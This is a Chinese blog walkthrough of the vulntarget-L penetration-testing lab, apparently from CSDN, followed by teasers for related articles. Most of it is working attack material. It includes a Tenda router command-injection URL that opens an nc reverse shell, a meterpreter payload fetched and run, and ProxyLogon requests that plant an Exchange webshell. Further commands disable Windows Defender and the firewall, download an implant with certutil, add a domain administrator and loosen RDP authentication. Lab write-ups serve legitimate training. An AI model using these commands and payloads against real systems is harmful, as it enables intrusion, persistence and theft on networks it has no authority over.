vulntarget-L(星期五实验室)

已于 2024-03-22 15:58:54 修改
阅读量1.6k 收藏 23
点赞数 13
文章标签: web安全
于 2024-03-20 14:58:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/ka_ka11/article/details/136876879
版权

靶场地址环境

百度网盘

链接:https://pan.baidu.com/s/1sv9qdioNF4PTUliix5HEfg

提取码:2dwq

自己修改外网的ip地址--nat模式

修改ip地址为自动,修改dns地址为114.114.114.114,修改完成应用,重新

关闭后进行重启

修改tenda 端口转发的地址,修改为自己的出网的ip地址


sudo iptables -t nat -A PREROUTING  -p tcp -d 192.168.126.140(自己的出网ip地址) --dport 60080 -j DNAT --to-destination 192.168.6.11:80
sudo iptables -t nat -A POSTROUTING -p tcp -s 192.168.6.11 --sport 80 -j SNAT --to-source 192.168.126.140(自己的出网ip地址)
sudo iptables-save

两个都出现web界面,就可以使用了

外网路由器

端口扫描

TOTOLINK

TOTOLINK 后续需要qmeu虚拟逃逸,但是只能拿到本身的权限,无法进行逃逸

Tenda

寻找版本号 V15.03.05.19_

漏洞搜索

Vulnerabilities (CVE)- OpenCVE

同样使用公众号中的命令执行漏洞

判断漏洞是否存在

http://192.168.138.130:60080/goform/setUsbUnload/?deviceName=;%20wget%20http://9tlb9ufl.dnslog.pw

反弹shell到服务器

http://192.168.138.130:60080/goform/setUsbUnload/?deviceName=;%20wget%20`nc -e /bin/bash 192.168.138.133 4560`

利用shell上传木马,

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.138.133 LPORT=3334 -f elf -o 3334.elf

木马生成后,利用python起一个http服务,将木马上传到受害主机

python3 -m http.server 81

wget http://192.168.138.133:81/3334.elf

msf设置监听

use exploits/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 192.168.138.133
set LPORT 3334
run

反弹shell

chmod 777 3334.elf
./3334.elf

外网路由器拿下

Exchange服务器

上传frp,建立代理

python3 -m http.server
wget http://192.168.138.133:8000/frpc
wget http://192.168.138.133:8000/frpc.ini

服务端+客户端配置

chmod 777 frps
frps -c frps.ini
chmod 777 frpc.ini
frpc -c frpc.ini
[common]
server_addr = 192.168.138.133
server_port = 7000

[socks5]
type = tcp
remote_port = 10000
plugin = socks5

[common]
bind_port = 7000

代理配置

出现下面界面,可以只恢复一下dc虚拟机镜像就可以

配置完成代理后,使用fsan进行扫描

配置代理规则

无法代理

fscan本身的代理

 fsan64.exe-socks5 192.168.138.133:10000 -h 172.18.10.100/24
E:\02-poc\fscan>fscan64.exe  -socks5 192.168.138.133:10000 -h 172.18.10.100/24

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
Socks5Proxy: socks5://192.168.138.133:10000
start infoscan
172.18.10.102:80 open
172.18.10.101:80 open
172.18.10.102:81 open
172.18.10.101:135 open
172.18.10.102:135 open
172.18.10.101:139 open
172.18.10.102:139 open
172.18.10.102:443 open
172.18.10.101:445 open
172.18.10.102:445 open
172.18.10.101:88 open
172.18.10.102:808 open
172.18.10.102:8172 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.18.10.102
   [->]exchange
   [->]172.18.10.102
[*] NetInfo:
[*]172.18.10.101
   [->]DC
   [->]172.18.10.101
[*] WebTitle: http://172.18.10.101      code:200 len:703    title:IIS Windows Server
[*] 172.18.10.101  (Windows Server 2016 Standard 14393)
[*] WebTitle: http://172.18.10.102      code:403 len:0      title:None
[+] http://172.18.10.101 poc-yaml-active-directory-certsrv-detect
[*] WebTitle: https://172.18.10.102     code:302 len:0      title:None 跳转url: https://172.18.10.102/owa/
[*] WebTitle: http://172.18.10.102:81   code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle: https://172.18.10.102/owa/auth/logon.aspx?url=https%3a%2f%2f172.18.10.102%2fowa%2f&reason=0 code:200 len:28244  title:Outlook
[*] WebTitle: https://172.18.10.102:8172 code:404 len:0      title:None
已完成 13/13
[*] 扫描结束,耗时: 6m32.9820281s

发现一个outlook服务

https://172.18.10.102/owa/auth/logon.aspx?replaceCurrent=1&url=https%3a%2f%2f172.18.10.102%2fowa%2f

利用CVE-2021-26855的SSRF和CVE-2021-27065组合拿shell

CVE-2021-26855的SSRF

从返回的结果来看,大概率存在ssrf

GET /ecp/target.js HTTP/1.1
Host: 172.18.10.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: X-BEResource=test_fariy/api/endpoint#~1; X-AnonResource=true

使用namp跑出域名

nmap -T3 -sV -n -sT -Pn -v -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/ews/ 172.18.10.102
nmap -T3 -sV -n -sT -Pn -v -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/oab/ 172.18.10.102
nmap -T3 -sV -n -sT -Pn -v -p 80,443 --script http-ntlm-info.nse --script-args http-ntlm-info.root=/autodiscover/ 172.18.10.102

这个组合漏洞利用需要邮箱密码,一般默认adiminisrator用户,同时域名已知也是利用前提

现在我们有域名和用户后,我们写入shell

https://github.com/herwonowr/exprolog.git
python exprolog.py -t 172.18.10.102 -e administrator@vulntarget.com

GET /owa/auth/tawhc.aspx HTTP/2
Host: 172.18.10.102
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

request=Response.Write(new ActiveXObject("WScript.Shell").exec("whoami /all").stdout.readall())

权限拿下,system

DC服务器

查看进程

GET /owa/auth/tawhc.aspx HTTP/2
Host: 172.18.10.102
Content-Type: application/x-www-form-urlencoded
Content-Length: 92

request=Response.Write(new ActiveXObject("WScript.Shell").exec("tasklist").stdout.readall())

发现安全设备,是windows defender 的

致盲window defender

关闭实时保护

GET /owa/auth/tawhc.aspx HTTP/2
Host: 172.18.10.102
Content-Type: application/x-www-form-urlencoded
Content-Length: 146

request=Response.Write(new 
ActiveXObject("WScript.Shell").exec("powershell Set-MpPreference -DisableRealtimeMonitoring $true").stdout.readall())

判断几个域

netdom query pdc  //判断存在几个域

nltest /dclist:vulntarget.com

查看域内的组

net group /domain

重点关注三个,它属于exchange域

*Exchange Servers
*Exchange Trusted Subsystem
*Exchange Windows Permissions

这个EXCHANGE$就是当前exchang机器的机器用户,而有这个用户的权限是用户组的WriteDACL权限,WriteDACL权限可以修改域对象的ACL,允许委托人修改受影响对象的DACL。这意味着攻击者可以添加或删除特定的访问控制项,从而使他们可以授予自己对对象的完全访问权限。

应该是域内委派,这个地方不会,后面慢慢学

现在直接上线cs

在外网路由器建以端口转发,无安全设备

Release v14.1 · snail007/goproxy · GitHub

./proxy http -t tcp -p "0.0.0.0:1236" --daemon

在exchange服务器,下载木马程序进行反弹

关闭exchange的防火墙

netsh advfirewall set allprofiles state off

查看防火墙状态

netsh Firewall show state

在外网服务器上启动web服务

python3 -m http.server

反弹shell到cs

certutil -urlcache -split -f http://172.18.10.100:82/22.exe
22.exe

尝试上面的方法很长时间了,但是没有通过代理上线。我直接在exchange上添加一个网卡,直接进行反弹,后面再看看能不能通过goproxy代理,上线,模拟刚才我们获得system权限,我们进行提权

完成上线后,我们创建个域账户

shell net user fooxs 8B..123admin@ /add /domain

开启远程桌面

wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

创建域账户号后,需要关闭鉴权,才能连接

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f

shell net localgroup Administrators fooxs /add

创建机器账户

机器账户默认具有dns权限

[*] 172.18.10.101  (Windows Server 2016 Standard 14393)
[+] http://172.18.10.101 poc-yaml-active-directory-certsrv-detect

我们继续判断一下,bolldyAD安装

# 判断用户能否创建机器账户

python main.py -d vulntarget.com -u foxs -p '8B..123admin@' --host 172.18.10.101 getObjectAttributes 'DC=vulntarget,DC=com' ms-DS-MachineAccountQuota

默认域中MAQ等于10,有权限创建对应的机器用户。

创建机器账户

proxychains python3 bloodyAD.py -d 'vulntarget.com' -u 'foxs' -p '8B..123admin' --host '172.18.10.101' addComputer foxs1 'foxs1'  //创建用户
proxychains python3 bloodyAD.py -d 'vulntarget.com' -u 'foxs' -p '8B..123admin' --host '172.18.10.101' setAttribute 'CN=foxs1,CN=Computers,DC=vulntarget,DC=com' DNSHOSTName '["DC.vulntarget.com"]' //更新用户的DNS

没有具体学过域的打法,部分脚本出现报错。到此为止,后面再打

ka_ka11
关注
vulntarget-j内网靶机write-up
千寻的博客
06-23 2391
注意:需要登录账号或者自己上传一个压缩包,存在漏洞的版本是1.1.0,经过测试1.1.1的已经对输入的进行过滤。第二次上传后:230601(1).asp(此时发现已经存在,进行重命名,进行截断)其中发现80、7001是we b网站,并且7001是个403界面。1、用第一层做中转监听,上线cs(记得关闭第一层的防火墙)发现开放了 80、3389、5985、7001的端口。想要得到这世上最好的东西,得先让世界看到最好的你。2、在进行文件上传,上传冰鞋的马,进行连接。3、进行上线,发现权限太低,上线哥斯拉。
打穿内网之Vulntarget-a靶场实战记录
tpaer的博客
11-11 2705
内容包括:通达OA未授权上传+文件包含RCE、Redis未授权写马、ms17-010永恒之蓝、代理转发内网跳板、CVE-2020-1472 域控杀器Zerologon、wmiexec/smbexec横向移动、cobalt strike与msf的shell传递
春秋云镜-2022网鼎杯
2301_80148821的博客
11-17 1104
通过certipy-ad创建一个机器账号Test2,并且设置DNS Host Name为域控的 XR-DC01.xiaorang.lab。然后,Schannel 将证书传递到 LDAPS, 修改 LDAP 配置 (例如配置 RBCD / DCSync), 进而获得域控权限。进入网站,发现是wordpress,这种一般都不会有啥直接漏洞,应该是插件漏洞,或者弱口令。爆破密码,弱口令admin,123456,之前lazysysadmin好像打过。然后申请证书模版,打了两次,不成功就继续打。
春秋云镜--Certify
cyy001128的博客
01-23 789
新工具:JNDIExploit、Certify先用fscan扫一下扫出来一个8993端口,是一个solr平台访问一下查看配置项,发现有log4j2。说明可能存在CVE-2021-44228补充:CVE-2021-44228log4j2 远程代码执行漏洞,通过 JNDI 注入实现log4j2 远程代码执行漏洞复现(CVE-2021-44228)_log4j命令执行流量特征-优快云博客直接用工具反弹shell记得先开监听,然后在vps运行JNDIExploit开启服务这里涉及到vps上部署java环境和上传J
vulntarget-e WP
m0_64317625的博客
11-12 1568
vulntarget-e
vulntarget靶场系列-a-writeup
渗透测试研究中心
12-13 778
网络配置外网WIN7:ip1: 192.168.127.91/255.255.255.0 ,gw:192.168.127.2 (NAT模式)ip2:10.0.20.98-vmnet1(仅主机模式)域主机成员:10.0.20.99-vmnet1(仅主机模式)10.0.10.111-vmnet2(仅主机模式)域控:10.0.10.110-vmnet2(仅主机模式)密码配置:Win7:win7/adm...
xray Web扫描器学习记录
weixin_50464560的博客
06-06 4405
简介项目地址:https://github.com/chaitin/xray 长亭科技研发的一款完善的安全评估工具,支持常见Web安全问题扫描和自定义POC,虽然Github有项目,但是不开源,只提供社区版本供大家使用。 基本使用代理模式代理模式下的基本架构为,扫描器作为中间人,首先原样转发流量,并返回服务器响应给浏览器等客户端,通讯两端都认为自己直接与对方对话,同时记录该流量,然后修改参数并重新发送请求进行扫描。这种原理和Burpsuite的自带的漏扫原理是一样的。 生成ca证书Bash# 生成 .
春秋云境 Certify WP
m0_62466350的博客
01-18 1935
本文首发作者博客园Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
春秋云境Certify-WP【一遍过】
weixin_63576152的博客
10-12 999
这里有几个用户名被修改成*了 因为都是些个人的账号密码,再联系前面扫到的三个3389端口,尝试爆破172.22.9.26(域控和CA域不大可能,172.22.9.26这个域内机器是最有可能的)开代理,先看172.22.9.47 文件服务器,刚好也开了445端口(TCP端口),直接可以连接。扫描可以看到一个solr,solr一般会有log4j漏洞,看到有log4j组件。再次远程连接172.22.9.26,成功,但是没有管理员权限,所以没什么用处。导出数据,编为字典user.txt和pass.txt,爆破。
Vulntarget-b靶场渗透WP
Fear1e4的博客
06-13 580
nmap端口探测网页访问端口目录扫描网页直接登陆报错404。访问admin.php,有后台管理系统登陆页。bp弱口令爆破admin123,版本1.8.1,查漏洞。
poco:Poco将使用简单的YAML配置文件帮助您组织和管理各种复杂程度的Docker,Docker-Compose,Kubernetes,Openshift项目,从而缩短从查找项目到在本地环境中初始化项目的路线
05-03
POCO Poco使用简单的YAML配置文件帮助组织和管理各种复杂性的Docker,Docker-Compose,Kubernetes项目,从而缩短了从查找项目到在本地环境中初始化项目的路线。 很简单。 使用非常简单的命令行界面配置,运行和在项目之间切换。 灵活性强。 轻松管理,扩展和维护任何复杂性的项目。 配置一次,到处使用。 一次配置项目,以便团队其他成员将感受到零配置的价值。 特征 开箱即用的Docker,Docker-Compose,Kubernetes,Helm支持。 Git,SVN支持开箱即用。 项目目录,多个目录。 创建您自己的项目目录。 无需其他工具即可组织您的项目。 多个计划。 为不同的环境甚至是出于演示目的的环境创建多个计划。 轻松地在计划(环境)之间切换。 简单的配置文件。 Poco有助于拆分配置文件,因此可以随时轻松维护和扩展它们。 脚本支持(挂钩
渗透靶场——vulntarget-a(完整版)
tlovejr的博客
03-25 6335
部署环境 此次靶场不再是单个镜像,而是三个镜像文件,接下来先给大家说一下整个环境的拓扑图以环境布置。 只需要把win7外网机和kali机同样的网卡host-Only形式即可,剩下的两台即可也是直接安排好了,无需做任何更改。 靶机下载地址: 信息收集 扫描主机 扫描同一网段中的存活主机 发现一个存活主机(其他的是我自己其他机器)192.168.1.9 扫描端口 扫描一下存活靶机的ip地址 nmap -A -p- 192.168.1.9 一看就知道这个存活靶机是一个win7系统,那么对于win7系统来说,4
Vulntarget-a打靶记录
qu_xiao_lei的博客
01-26 705
由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client chanllenge)、IV等要素可控的情况下,存在较高概率使得产生的密文为全零。这里的原理是:在win2016中上传木马,该木马是将2016的shell反弹至win7中的1111端口,win7中需要用端口转发工具lcx将1111端口中的shell转发至kali的2222端口,这样在kali中监听2222端口就拿到了win2016的shell。
春秋云境2022网鼎杯半决赛-WP【一遍过】
weixin_63576152的博客
10-17 1489
注意,这里的certipy不是出现命令不存在kali让你下载的那个,这个是个打CVE-2022–26923的工具:https://github.com/ly4k/Certipy/打开http://172.22.15.24/phpmyadmin用账号和密码登了一下,发现有个表有一堆域账户。(脚本链接:https://github.com/AlmondOffSec/PassTheCert/)wordpress,打开http://39.99.137.31/wp-admin。原来是**校园网,后来换热点就可以了。
vulntarget-m-攻防应急靶场学习笔记
m0_64777251的博客
04-13 3354
对于后面内存马的审计,分析有些不懂,比较模糊。继续学习” />[外链图片转存中…(img-Cb0IA5HT-1713019622179)]下载到本地[外链图片转存中…(img-l7zi540I-1713019622179)]用d盾直接扫[外链图片转存中…(img-Y2GLHdH1-1713019622179)][外链图片转存中…(img-yD7uL4xD-1713019622179)]对于后面内存马的审计,分析有些不懂,比较模糊。继续学习。
安装 Active Directory 证书服务的时候没有Certsrv
weixin_30537391的博客
09-17 1189
在Windows Server 的时候一直没有Certsrv这个目录。 需要检查一下在IIS中网站的ID顺序。 默认使用ID为1的。 转载于:https://www.cnblogs.com/qiumc/p/11533643.html
活动目录(Active Directory安全审计
ITmoster的博客
04-26 756
ADAudit Plus 可以清楚地显示 AD 资源所做的所有更改,包括 AD 对象、属性、组策略等。AD 审计有助于检测和响应内部威胁、特权滥用和其他妥协指标,简而言之,可以增强组织的安全性。
【内网攻防】| vulntarget漏洞靶场系列()
Ms08067安全实验室
10-18 141
点击星标,即时接收最新推文文章来源|MS08067 内网攻防 知识星球本文作者:godunt玩靶场 认准内网攻防目前,安全行业热度逐年增加,很多新手安全从业人员在获取技术知识时,会局限于少量的实战中,技术理解得不到升华,只会像个脚本小子照着代码敲命令,遇到实战时自乱阵脚,影响心态的同时却自叹不如。而安全练兵场是由理论知识到实战过渡的一道大门,安全练兵场星球鼓励大家从实战中成长,提供优质的靶场系列,...
我的漏洞扫描及安全应急之道
wulanlin的博客
12-29 2004
编写POC 以xray为例 插件编写 官方公布最基础的POC如下 name: poc-yaml-example-com # 脚本部分 transport: http rules: r1: request: method: GET path: "/" expression: | response.status==200 && response.body.bcontain
vulntarget-c
最新发布
03-15
### 关于 vulntarget-c 的 GitHub 项目和技术文档 vulntarget 是一种常用于安全测试和漏洞研究的目标环境集合,旨在帮助研究人员学习和实践各种攻击向量以及防御机制。对于 vulntarget-c 而言,它通常代表了一个特定的安全目标场景或者是一个具有已知漏洞的应用程序配置[^1]。 #### 如何查找与 vulntarget-c 相关的技术资料或项目? 可以通过以下方法来定位相关的资源: 1. **GitHub 搜索功能** 使用 GitHub 提供的强大搜索工具可以快速找到开源项目。输入关键词 `vulntarget-c` 或者扩展查询条件如 `"vulntarget-c site:github.com"` 可以缩小范围并获取精确的结果。此外,还可以尝试更通用的术语组合,比如 `vulnerability target c github` 来增加匹配的可能性[^2]。 2. **官方文档或其他社区贡献的内容** 如果存在正式发布的文档,则可能位于项目的 Releases 页面或是 Wiki 部分;同时也可以查看 Issues 和 Discussions 中是否有其他用户分享的经验贴或教程链接[^3]。 3. **第三方平台上的讨论区** 像 Reddit、Stack Overflow 这样的开发者论坛上经常会有针对某些具体主题展开深入探讨的文章。通过搜索引擎加上站点限定符(例如:site:stackoverflow.com),能够更容易发现那些隐藏 gems[^4]。 以下是基于上述建议的一个简单 Python 脚本示例,展示如何自动化执行基本的网络爬取操作以便收集潜在的相关信息源地址列表: ```python import requests from bs4 import BeautifulSoup def search_github(keyword): url = f"https://github.com/search?q={keyword}" response = requests.get(url) soup = BeautifulSoup(response.text, 'html.parser') repos = [] for item in soup.select('.repo-list-item'): title_element = item.find('a', class_='v-align-middle') description_element = item.find('p', class_='mb-1') repo_name = title_element['href'] if title_element else None desc_text = description_element.get_text(strip=True) if description_element else '' repos.append({ 'name': repo_name, 'description': desc_text }) return repos results = search_github("vulntarget-c") for result in results[:5]: print(f"{result['name']} - {result['description']}") ``` 此脚本仅作为演示用途,请注意实际应用中的法律合规性和道德规范问题。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值